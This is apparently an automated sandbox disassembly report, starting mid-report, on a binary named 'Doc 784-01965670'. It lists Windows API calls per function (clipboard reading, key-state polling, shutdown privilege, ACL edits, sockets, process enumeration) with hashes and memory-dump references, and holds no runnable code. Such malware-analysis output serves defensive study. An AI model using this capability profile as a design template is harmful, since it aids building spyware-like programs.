  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
• _wcscpy.LIBCMT ref: 004039C2
• _wcslen.LIBCMT ref: 00403A53
• _wcslen.LIBCMT ref: 00403AAA
Strings
• #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
• Unterminated string, xrefs: 0042B9BA
• _, xrefs: 00403B48
• Error opening the file, xrefs: 0042B8AC
Similarity
• API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
• API String ID: 4115725249-188983378
• Opcode ID: 9d3cc106af837a0ba3a302398e1680714f0cc5ac52ed53ec90940b3ab90f08f5
• Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
• Opcode Fuzzy Hash: 9d3cc106af837a0ba3a302398e1680714f0cc5ac52ed53ec90940b3ab90f08f5
• Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00434C12
• GetFileAttributesW.KERNEL32(?), ref: 00434C4F
• SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
• FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
• FindClose.KERNEL32(00000000), ref: 00434C88
• FindClose.KERNEL32(00000000), ref: 00434C9C
• FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
• SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
• SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
• FindClose.KERNEL32(00000000), ref: 00434D35
• FindClose.KERNEL32(00000000), ref: 00434D43
Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                    • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                    • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                                    • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                    • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Timetime$Sleep
                                                                                                                                    • String ID: BUTTON
                                                                                                                                    • API String ID: 4176159691-3405671355
                                                                                                                                    • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                    • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                                    • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                    • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,75918FB0,75918FB0,?,?,00000000), ref: 00442E40
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                                                                      • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                    • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                                    • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                                                                                    • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                                    • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                                      • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                                      • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                                      • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                                    • _memset.LIBCMT ref: 00445E61
                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                                    • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                                    • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                                    • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3490752873-0
                                                                                                                                    • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                    • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                                    • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                    • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                                    APIs
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                                    • _memset.LIBCMT ref: 0047AB7C
                                                                                                                                    • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                                    • _memset.LIBCMT ref: 0047ACCD
                                                                                                                                    • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                                    • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                                    Strings
                                                                                                                                    • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                    • API String ID: 1588287285-2785691316
                                                                                                                                    • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                    • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                                    • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                    • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                                    • GetLastError.KERNEL32 ref: 00436504
                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                    • API String ID: 2938487562-3733053543
                                                                                                                                    • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                    • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
• Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
• Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
APIs
• __swprintf.LIBCMT ref: 00436162
• __swprintf.LIBCMT ref: 00436176
  • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
• __wcsicoll.LIBCMT ref: 00436185
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
• LoadResource.KERNEL32(?,00000000), ref: 004361AE
• LockResource.KERNEL32(00000000), ref: 004361B5
• FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
• LoadResource.KERNEL32(?,00000000), ref: 004361E4
• SizeofResource.KERNEL32(?,00000000), ref: 004361F0
• LockResource.KERNEL32(?), ref: 004361FD
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
• String ID:
• API String ID: 2406429042-0
• Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
• Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
• Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
• Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D522
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
• GetLastError.KERNEL32 ref: 0045D59D
• SetErrorMode.KERNEL32(?), ref: 0045D629
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
• Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
• Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
• Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
APIs
• MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
• OleInitialize.OLE32(00000000), ref: 0047AE06
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _wcslen.LIBCMT ref: 0047AE18
• CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
• CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
• GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
• String ID: HH
• API String ID: 1915432386-2761332787
• Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
• Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
• Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
• Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID: DEFINE$`$h$h
• API String ID: 0-4194577831
• Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
• Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
• Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
• Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
APIs
• socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
• WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
• bind.WSOCK32(00000000,?,00000010), ref: 004648DA
• WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
• closesocket.WSOCK32(00000000), ref: 0046492D
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketsocket
• String ID:
• API String ID: 2609815416-0
• Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
• Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
• Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
• Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
• Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
• Process32NextW.KERNEL32(00000000,?), ref: 00437075
• __wsplitpath.LIBCMT ref: 004370A5
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscat.LIBCMT ref: 004370BA
• __wcsicoll.LIBCMT ref: 004370C8
• CloseHandle.KERNEL32(00000000,?), ref: 00437105
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
• Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
• Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
• Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
• Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                                    • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 2693929171-438819550
APIs
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GlobalLock.KERNEL32(00000000), ref: 0046C688
• CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
• CloseClipboard.USER32 ref: 0046C866
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
• String ID: HH
• API String ID: 589737431-2761332787
APIs
• __wcsicoll.LIBCMT ref: 0043643C
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
• __wcsicoll.LIBCMT ref: 00436466
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
Strings
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
APIs
  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
• WSAGetLastError.WSOCK32(00000000), ref: 00474233
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
APIs
• GetCursorPos.USER32(004A83D8), ref: 0045636A
• ScreenToClient.USER32(004A83D8,?), ref: 0045638A
• GetAsyncKeyState.USER32(?), ref: 004563D0
• GetAsyncKeyState.USER32(?), ref: 004563DC
• GetWindowLongW.USER32(?,000000F0), ref: 00456430
